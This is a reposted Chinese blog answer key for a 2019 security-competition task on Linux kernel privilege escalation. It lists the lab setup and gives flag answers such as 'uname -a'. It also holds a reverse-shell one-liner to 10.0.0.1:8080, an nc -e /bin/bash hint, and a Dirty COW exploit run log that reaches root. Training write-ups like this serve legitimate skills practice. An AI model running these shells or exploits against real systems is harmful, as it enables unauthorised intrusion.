任务1：Linux Kernel提权（50分）[2019年信息安全管理与评估赛题答案 -01]

Posted 2022-03-09 nul1

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了任务1：Linux Kernel提权（50分）[2019年信息安全管理与评估赛题答案 -01]相关的知识，希望对你有一定的参考价值。

任务环境说明：

攻击机：

物理机：Windows7

物理机安装工具1：Microsoft Visual Studio 2008

物理机安装工具2：OllyICE

虚拟机1：Ubuntu_Linux

虚拟机1安装工具1：Python3/Python2

虚拟机1安装工具2：GCC

虚拟机1安装工具3：GDB

虚拟机1安装工具4：Netcat

虚拟机1用户名：root，虚拟机1密码：123456

虚拟机操作系统2：CentOS_Linux

虚拟机2安装工具1：GCC

虚拟机2安装工具2：GDB

虚拟机2用户名：root，虚拟机2密码：123456

靶机：

服务器场景1：WindowsServer

服务器场景1的FTP下载服务用户名：anonymous

服务器场景2：LinuxServer_01

任务内容：

1.登录服务器场景2的WebShell，通过相关手段打印当前系统相关信息（内核版本号、硬件架构、主机名称和操作系统类型等，命令并非查看文件），将操作命令作为FLAG值提交；

答案：uname -a

#拿到的webshell后面的题目需要反弹，如果有NC直接nc -e /bin/bash，没有的话也可以直接通过bash反弹命令：bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

2.根据操作命令回显将内核版本信息作为FLAG值提交；

操作命令：uname -r

3.通过相关手段对服务器场景2上传提权文件，将上传成功提示单词全部作为FLAG值提交；

不清楚是什么提权方式，无法作答；

疑似：脏牛、CVE-2017-16995....

脏牛：

[email protected]:/tmp$gcc -Wall -o hello dirtycow-mem.c -ldl -lpthread
[email protected]:/tmp$ ls
hello
[email protected]:/tmp$ chmod +x hello
[email protected]:/tmp$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[email protected]:/tmp$ ./hello
[*] range: b7573000-b7716000]
[*] getuid = b762bd10
[*] mmap 0xb73cb000
[*] exploiting (patch)
[*] patched (madviseThread)
[*] patched (procselfmemThread)
[email protected]:/tmp# [*] exploiting (unpatch)
[*] unpatched: uid=33 (madviseThread)
[*] unpatched: uid=33 (procselfmemThread)

[email protected]:/tmp# id
uid=0(root) gid=0(root) groups=0(root)